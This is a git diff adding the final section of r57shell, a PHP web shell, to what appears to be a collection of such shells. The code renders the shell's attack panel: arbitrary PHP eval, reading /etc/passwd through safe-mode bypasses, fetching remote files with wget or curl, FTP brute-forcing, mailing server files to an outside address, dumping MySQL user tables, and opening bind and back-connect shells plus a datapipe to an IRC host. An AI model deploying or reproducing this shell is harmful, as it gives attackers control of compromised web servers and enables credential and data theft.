sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.$lang[$language.'_text57'].up_down('id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text67'].up_down('id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.$lang[$language.'_text7'].up_down('id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select
name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text54'].up_down('id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.$lang[$language.'_text76'].up_down('id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)."
* ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text32'].up_down('id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text33'].up_down('id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.$lang[$language.'_text34'].up_down('id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text35'].up_down('id12').$table_up2.div('id12').$ts;
+echo
sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.$lang[$language.'_text85'].up_down('id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo
$table_up1.$lang[$language.'_text5'].up_down('id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&!$windows){
+echo $fs.$table_up1.$lang[$language.'_text15'].up_down('id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.$lang[$language.'_text86'].up_down('id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
+if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').'
'.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.$lang[$language.'_text93'].up_down('id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo
sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.$lang[$language.'_text94'].up_down('id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=Verdana size=-2>".$lang[$language.'_text99']."
( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.$lang[$language.'_text102'].up_down('id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+$arh =
$lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
+if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none').' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on) $select .= '<option>PostgreSQL</option>';
+if($ora_on) $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.$lang[$language.'_text82'].up_down('id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text77']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text78'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_show').in('checkbox','st id=st',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text79'].$arrow."</b>",in('checkbox','sc id=sc',0,'1'));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center
id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(45,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
+echo sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo
sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=35 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&!$windows){
+echo $table_up1.$lang[$language.'_text81'].up_down('id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ?
(getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=Verdana size=-2><b>o---[ r57shell - http-shell by RST/GHC | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---o</b></font></div></td></tr></table>".$f;
+include ($a.$b.$c);
+?>
+
diff --git a/php/PHPshell/م€گr57م€‘/r572.jpg b/php/PHPshell/م€گr57م€‘/r572.jpg
new file mode 100644
index 0000000..21835d9
Binary files /dev/null and b/php/PHPshell/م€گr57م€‘/r572.jpg differ